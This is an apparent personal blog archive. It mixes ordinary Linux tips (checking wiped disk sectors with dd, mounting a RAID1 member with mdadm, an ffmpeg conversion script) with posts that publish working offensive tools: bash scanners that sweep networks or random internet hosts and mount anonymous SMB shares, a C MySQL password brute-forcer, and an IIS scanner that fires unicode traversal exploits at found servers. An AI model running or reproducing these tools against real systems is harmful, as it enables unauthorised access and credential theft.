Archiv des Autors: daniel

verify (read and write) sectors at a harddisk ( for example after wipe )

Hello

the last days i have wiped a harddisk with a nwipe.
now i want to test if the sectors are correct overwritten with random data or better at the end with the blanking pass.

to do that i have used

root@host:~$ dd if=/dev/sda of=testSector count=1 bs=512 skip=848234
root@host:~$ ls -lah testSector 
-rw-r--r-- 1 root root 512 Mai 9 20:51 testSector

where 848234 is the Sector Number in that example

the result is

root@host:~$ cat testSector | od -o
0000000 000000 000000 000000 000000 000000 000000 000000 000000
*
0001000

that means the disk is at that sector successfully blanked 😉

 

Hint: to write some random data to this sector you can use the seek option

dd if=/dev/urandom of=/dev/sda  count=1 bs=512 seek=848234
root@host:~$ dd if=/dev/urandom of=/dev/sda count=1 bs=512 seek=84234
1+0 Datensätze ein
1+0 Datensätze aus
512 bytes copied, 0,000171533 s, 3,0 MB/s
root@host:~$ dd if=/dev/sda of=testSector count=1 bs=512 skip=848234
root@host:~$ cat testSector | od -o
0000000 152264 101766 076373 004631 135374 176667 050103 073263
0000020 003573 113101 054520 134473 050305 161767 062320 122631
0000040 112241 040731 164452 151325 110756 103712 122175 007127
0000060 106677 111246 151736 134123 070055 071502 127052 006733
0000100 016462 140063 106340 075113 135236 040731 070540 050634
0000120 120725 012544 137356 004304 135025 077212 037105 063232
0000140 017500 020745 164012 066752 117227 034401 102106 002367
0000160 043327 102742 100723 021743 104661 175100 167331 121240
0000200 161230 165423 021265 031457 053316 140015 007725 136412
0000220 100223 067136 166016 042721 046442 002012 121731 024135
0000240 044776 050324 126152 127215 057712 041523 113266 024335
0000260 016362 000614 135326 162237 055575 117146 014014 116267
0000300 004072 173014 122470 135151 122400 041037 100437 151255
0000320 162432 103334 023300 074714 056124 016406 007221 032507
0000340 121605 047133 027122 030424 137170 123053 103476 161352
0000360 063070 052450 111541 022277 015016 113155 027252 147123
0000400 131134 031073 117501 126474 047361 041560 013720 073711
0000420 024352 117055 016246 054663 172336 036371 027345 020214
0000440 160543 152253 010601 115263 176535 106513 112731 150711
0000460 146652 032205 156223 173052 070052 120633 160266 057257
0000500 175317 177705 063171 004156 075675 115245 072707 165572
0000520 011106 075707 062765 035245 042650 121131 036537 110032
0000540 077717 112056 160525 132765 054451 033665 116436 003052
0000560 030666 137100 072461 047316 034617 176217 013447 012607
0000600 006055 010351 010703 010537 050256 132356 147016 016417
0000620 017170 015713 035343 026253 047034 036250 165207 107541
0000640 005664 044402 073542 051567 060003 044253 152435 063107
0000660 033037 101026 012541 130057 021666 124712 106530 065053
0000700 026762 166473 122303 140272 054466 135251 107330 142724
0000720 075672 047672 003550 136406 100752 004503 013000 074173
0000740 160230 167304 126156 043055 042616 035035 127507 170670
0000760 167460 155627 013361 033221 101157 100050 130744 112503
0001000

 

 

Rescue Raid Data / mount raid disks

Today i want to access/mount a single disk of my WDCloud Mirror Gen2   Raid1 with my Linux

i tried to mount it (first i have figured out the partition with gparted)

root@pc:~# mkdir -p /media/nfsdisk 
root@pc:~# mount /dev/sdb2 /media/
mount: unknown filesystem type 'linux_raid_member'
Medium /dev/sda: 5,5 TiB, 6001175126016 Bytes, 11721045168 Sektoren
Einheiten: sectors von 1 * 512 = 512 Bytes
Sektorengröße (logisch/physisch): 512 Bytes / 4096 Bytes
I/O Größe (minimal/optimal): 4096 Bytes / 4096 Bytes
Typ der Medienbezeichnung: gpt
Medienkennung: 830CEC50-A486-4BBB-82F9-F61FAB8C98F4

Gerät Start Ende Sektoren Größe Typ
/dev/sda1 2048 4196351 4194304 2G Microsoft basic data
/dev/sda2 6293504 11718945899 11712652396 5,5T Microsoft basic data
/dev/sda3 11718946816 11721045134 2098319 1G Microsoft basic data
/dev/sda4 4196352 6293503 2097152 1G Microsoft basic data

Die Einträge der Partitionstabelle stimmen nicht mit der Reihenfolge der Medien überein.

examine /dev/sdb2

root@pc:~# mdadm --examine /dev/sdb2
/dev/sdb2:
          Magic : c54a7cba
        Version : 1.0
    Feature Map : 0x1
     Array UUID : 4151f8f8:4151f8f8:4151f8f8:4151f8f8
           Name : 1
  Creation Time : Thu Nov 19 12:21:47 2015
     Raid Level : raid1
   Raid Devices : 2

 Avail Dev Size : 5852141296 (2790.52 GiB 2996.30 GB)
     Array Size : 2926070648 (2790.52 GiB 2996.30 GB)
   Super Offset : 5852141552 sectors
          State : clean
    Device UUID : 22f64ef8:4151f8f8:413abe12:34ac24a6

Internal Bitmap : 2 sectors from superblock
    Update Time : Mon Jul 18 20:57:32 2016
       Checksum : 11e885b1 - correct
         Events : 226


   Device Role : Active device 0
   Array State : A. ('A' == active, '.' == missing)

 

 

i tried to mount it with

root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/sdb2 is busy - skipping

 

but it does not work

root@pc:~# mdadm --stop /dev/md1
mdadm: stopped /dev/md1
root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/md1 has been started with 1 drive (out of 2).
root@pc:~# mount /dev/md1 /media/nfsdisk
root@pc:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 1,8T 0 disk 
├─sda1 8:1 0 931,4G 0 part 
├─sda2 8:2 0 2,8G 0 part [SWAP]
└─sda3 8:3 0 928,7G 0 part /home
sdb 8:16 0 2,7T 0 disk 
├─sdb1 8:17 0 2G 0 part 
├─sdb2 8:18 0 2,7T 0 part 
│ └─md1 9:1 0 2,7T 0 raid1 /media/nfsdisk
├─sdb3 8:19 0 1G 0 part 
└─sdb4 8:20 0 1G 0 part 
sdc 8:32 0 1,8T 0 disk 
└─sdc1 8:33 0 1,8T 0 part 
sdd 8:48 0 111,8G 0 disk 
└─sdd1 8:49 0 111,8G 0 part /
sde 8:64 0 119,2G 0 disk 
└─sde1 8:65 0 119,2G 0 part 
sr0 11:0 1 4,2G 0 rom
root@pc:~# mount | grep md1
/dev/md1 on /media/nfsdisk type ext4 (rw)

hint at the end

root@pc:~# mdadm --assemble --scan

 

video 2 mp4 converter

created a new script for movie 2 mp4 convertion

features:

*  save metadata
* save creaton date
* delete greater files if you whant

#!/bin/bash
# 
# converter for video files to mp4
# this script delete also all huger files if you want
# please take care with DELETE FILES = yes
# double check our output first if the quality is good enough for you
# this script keeps metadata and date of creaton for the file
#
# written 2016/07/17 by Daniel Gohlke to clean up my NAS
#
# you need ffmpeg and some codecs, if i forget something please update this script
# sudo apt-get install libavcodec-extra-53 libavutil-extra-51 libavformat-extra-53 libx264-146 ffmpeg
# change what ever you need

EXTENSION_NEW="mp4"
DELETE_FILES="no"
DEFAULT_CRF="22" # some kind of medium
OUTPUT_DIR="output"

read -p "Please enter CRF Quality / higher value is lower quality [51 worst .. 0 Loseless (default $DEFAULT_CRF) ]: " CRF
CRF=${CRF:-$DEFAULT_CRF}
echo "convert with CRF $CRF"


# error handling
function finish {
  if [ $FILENAME ]; then
    echo "some error occoured, cleanup file $OUTPUT_DIR/$FILENAME.mp4"
    echo "Error on line $1"
    rm -f "$OUTPUT_DIR/$FILENAME.mp4"
  else
    echo "User Break, leave $d untouched"
  fi
  rm -f $OUTPUT_DIR/filelist.txt
}

# Trap if something failed
trap 'finish $LINENO' ERR
#trap 'finish $LINENO' EXIT


function start_convert {

 mkdir -p $OUTPUT_DIR
 find . -type f \( ! -iname "filelist.txt" \) | grep -v "$OUTPUT_DIR" > $OUTPUT_DIR/filelist.txt 
   for d in $( cat $OUTPUT_DIR/filelist.txt ); do
#  for d in *; do
    echo "converting with crf $DEFAULT_CRF $d";
    FILENAME=$(basename "$d")
    EXTENSION="${FILENAME##*.}"
    FILENAME="${FILENAME%.*}"
    
    # convert
    ffmpeg -stats -i $d -c:v h264 -strict experimental -crf $CRF -map_metadata 0 $OUTPUT_DIR/$FILENAME.mp4

    # pply another file's attributes to new file
    touch -r $d $OUTPUT_DIR/$FILENAME.mp4    
    FILESIZE_OLD=$(stat -c%s "$FILENAME.$EXTENSION")
    FILESIZE_NEW=$(stat -c%s "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW")
#    echo $FILESIZE_OLD  
#    echo $FILESIZE_NEW
    
    if [ "$DELETE_FILES" == "yes" ]; then
      echo "delete greater files is turned on"
  
      if [ "$FILESIZE_OLD" -ge "$FILESIZE_NEW" ]; then
        echo "delete $FILENAME.$EXTENSION"
        rm -f $FILENAME.$EXTENSION
      else 
       echo "delete $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
       rm -f $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW
      fi
        
    else 
      echo "delete greater files is turned off"
    fi
    
  done

rm -f $OUTPUT_DIR/filelist.txt
exit 0
}

#ffmpeg -stats -i 0621232021DVB-TDasErste.m4v -c:v h264 -strict experimental -crf 20 -map_metadata 0  FILENAMEdefaultcrf20.mp4

# Start Program
read -p "Do you wish to start convert your videos? (y/n)" yn
case $yn in
  [Yy]* ) start_convert;;
  [Nn]* ) exit;;
   * ) echo "Please answer yes(y) or no(n).";;
esac

 

link to github: https://github.com/danielgohlke/scripts/blob/master/converttomp4.sh

 

 

SMBScan version 1.2

Simple Smb Scanner written in Bash for linux for newer systems with zmap support
smbscan-1.2.tar.gz
(Download all) for new systems (2015) with zmap and so on
– added zmap support
– replaced smbmount with mount
– removed dialog an whiptail

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
MNT=/bin/mount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
ZMAP=/usr/sbin/zmap
CHARSET="iso8859-1"
TIMEOUT=2
usage() { echo "Usage: $0 [-z number of hosts (zmap)] [-n ip/range (nmap)]" 1>&2; exit 1; }

while getopts "n:z:" opt; do
  case "$opt" in
    n)
      echo "using nmap with ${OPTARG}" >&2
      NMAPSCAN=1
      test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
      IP=${OPTARG}
      ;;
    
    z)
      echo "using zmap with ${OPTARG} hosts" >&2
      ZMAPSCAN=1
      test -x $ZMAP || { echo -e 'zmap not found !';exit 1; }
      z=${OPTARG}
      ;;
    h)
      echo "Invalid option: -$OPTARG" >&2
      usage
      ;;
    *)
      echo "Option -$OPTARG requires an argument. " >&2
      usage
      exit 1
      ;;
  esac

done

if [ -z $ZMAPSCAN ] && [ -z $NMAPSCAN ]; then
   usage
fi

shift $((OPTIND-1))


test -x $MNT || { echo -e 'mount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }


function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
        echo "Written by cd ;)"
        echo "Scan started against to $1 on port 139"
        echo "This can take a while"


if [ "$NMAPSCAN" = 1 ] 
    then
          echo "search via nmap at ip/range ${n} for hosts who has opened port 139"
      $NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
      cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
else
          echo "search via zmap for ${z} hosts who has opened port 139"
      $ZMAP -N ${z} -p 139 -B 1M -q -o ./out 
          sed -i '1d' ./out #delete first line "saddr" for csv
fi
shift $((OPTIND-1))

    
rm -f ./$IP.out
check_it

if [ $SUM = 0 ]
    then 
    echo "Sorry
    No SMB Server found !
        
      Thanks for use ... "
   rm -f ./out
   exit 1
fi

    echo "Please wait...
      Searching 4 Shared Directories"
while read host ;
    do
    # Get Computer name
    echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
    name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

    # Get Workgroup name
    workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

    # if name not set so use this one
    workgroup=${workgroup:=WORKGROUP}

    name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
    echo "Searching name via nmblookup (M)"
    name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
    echo "Searching Name via nmblookup (H)"
    name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
    echo "Searching Name via Smbclient ... using Servername"
    name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}


    
    # search for shared folders
    echo "looking for shared directorys on $host"
    # kill old sleep process
    kill -9 `pidof sleep` 2&>1
    $SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
    sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1
        
        exist=0
        while read LIST ;
                do
            exist=1
            #make directory for the shares
            mkdir -p ./"$name-$host/$LIST"
            #add a logfile
            #touch ./"$name-$host/ip-is-$host"
                    $MNT -t cifs -o guest,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t cifs -o user=nobody,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t nfs $host:/$LIST ./$name-$host/$LIST


        echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
        if [ $exist = 1 ]
        then
            #write some useful or not very useful informations into a log 
            echo " 
            $name - $host
            Last found: `date`
            Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
        fi
        done < ./$host.shares

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
    echo "
SMBScan v 1.2 -> listing mounted smb file systems

`cat ./mounts | more`
"
rm -f ./mounts
rm -f ./out

umountall.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount -f */*

Samba / Netbios network scanner (SMBScan) for Linux

Simple Smb Scanner written in Bash for linux for oder Systems

smbscan-1.1.tar (Download all) for older systems (anno 2006)

smbscan.sh

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
#rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
SMBM=/usr/bin/smbmount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
DIALOG=/usr/bin/dialog
#WHIP=/usr/bin/whiptail
CHARSET="iso8859-1"
# BUNT 1 = Console
# BUNT 0 = with Whiptail or dialog graphics
BUNT=1
TIMEOUT=5

#test -x $WHIP
test -x $DIALOG && DIALOG=$DIALOG
#test -x $WHIP || BUNT=0
test -x $SMBM || { echo -e 'smbmount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }
# hehe i know that suxx ;)
clear

function script_kiddie() {
if [ $BUNT -eq 1 ]
then
    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.1"
	else
	    $DIALOG --title "v 1.1" --infobox " ScR1p7k1dDi3 Pr0t3c7 Sy5t3m" 6 20
fi
exit 1 
}
script_kiddie

if [ $# -eq 1 ]
then
    echo "$1" > ./out
        else
	    $DIALOG --title "SMBscan v.1.1" --inputbox "                Written by cd ;)

Please enter IP range
e.g 10.0.0.1-24 or 10.0.1-255.5-30
or type ./smbscan 10.0.0.1-254

http://www.bastardo.de <- get newest version" 13 50 2> ./out
fi

function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
if [ $BUNT -eq 1 ]
    then
#	test -e $1 || { echo -e "$0 [ip room]"; exit 1; }
	    echo "Written by cd ;)"
	    echo "Scan started against to $1 on port 139"
	    echo "This can take a while"
fi

check_it
IP=`cat ./out`
rm -f ./out
# i think that is the fastest, we whant to scan only 1 port ... not more 
$NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
rm -f ./$IP.out
check_it
if [ $SUM = 0 ]
    then 
	if [ $BUNT -eq 1 ]
	    then
echo "
    No SMB Server found.

      Thanks for use ..."
		rm -f ./out
		exit 1
		    else
			$DIALOG --title "Sorry" --infobox "
    No SMB Server found !

      Thanks for use ... " 7 30
			rm -f ./out
			exit 1
	fi
fi

if [ $BUNT -eq 1 ]
    then
	echo "Please wait...
      Searching 4 Shared Directories"
	else
	    $DIALOG --infobox "Please wait !
Searching 4 Shared Directories..." 5 40
fi
while read host ;
    do
	# Get Computer name
	echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
	name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

	# Get Workgroup name
	workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

	# if name not set so use this one
	workgroup=${workgroup:=WORKGROUP}

	name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
	echo "Searching name via nmblookup (M)"
	name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
	echo "Searching Name via nmblookup (H)"
	name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
	echo "Searching Name via Smbclient ... using Servername"
	name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}

	# search for shared folders
	echo "looking for shared directorys on $host"
	# kill old sleep process
	kill -9 `pidof sleep` 2&>1
	$SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
	sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1

	    exist=0
	    while read LIST ;
	    		do
		    exist=1
		    #make directory for the shares
		    mkdir -p ./"$name-$host/$LIST"
		    #add a logfile
		    #touch ./"$name-$host/ip-is-$host"
		    $SMBM "//$host/$LIST" "./$name-$host/$LIST" -o defaults,guest,iocharset=utf8

			if [ $BUNT -eq 1 ]
			    then
				echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
			    else
				$DIALOG --infobox  "trying to mount //$host/$LIST into ./$name/$LIST" 10 60
			fi
		if [ $exist = 1 ]
		then
		    #write some useful or not very useful informations into a log 
		    echo " 
		    $name - $host
		    Last found: `date`
		    Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
		fi
	    done < ./$host.shares
#	    echo `mount | $GREP cifs | grep $host` >> ./"$name-$host/ip-is-$host"

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
if [ $BUNT -eq 1 ]
    then
	echo "
SMBScan v 1.1 -> listing mounted smb file systems

`cat ./mounts | more`
"
    else
	$DIALOG --title "SMBScan v 1.1 -> listing mounted smb file systems" --textbox mounts 10 60
fi
rm -f ./mounts
rm -f ./out

 

The unmount script

umount.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount */*/*
#umount `mount | grep smbfs | awk '{print $3}'`
kill -9 `ps aux | grep mount.cifs | awk '{print $2}'`

 

The Makefile for „make install“

PREFIX=/usr/sbin/
install:
	@cp smbscan.sh $(PREFIX)
	@cp umountall.sh $(PREFIX)

uninstall:
	@rm $(PREFIX)smbscan.sh
	@rm $(PREFIX)umountall.sh

 

 

MySQL Bruteforce for Linux and Windows

Linux Source and Binarys

mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar
(sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
You need to install ncurses

apt-get install libncurses5-dev libncurses5

Windows Source and Binarys

mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows

Here is the Source (Linux)

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// Deutsch oder English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben 
*   23.03 2010 by cd 
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   oder -O6 anstatt -O2
*  ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
*  log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for the people that understand no german change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the old good time MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

MYSQL *my;

int count=0;
char *passwd;

#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122  // 127 set end ascii cahr
#define BUFF_SIZE 1024
#define LEN 80

char buffer[BUFF_SIZE];
int jump=0;

int main (int argc, char *argv[])
{
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

switch(eingabe)
{
case 'b':
while(1)
{
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
next:
dummy=1;
}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}

 

 

IISscan shell script

IIS Scanner

you can find this script also at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
clear
if [ $# -ne 2 ]
    then
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
rm fluff
sum=0
g=`cat $2.exp | wc -c`
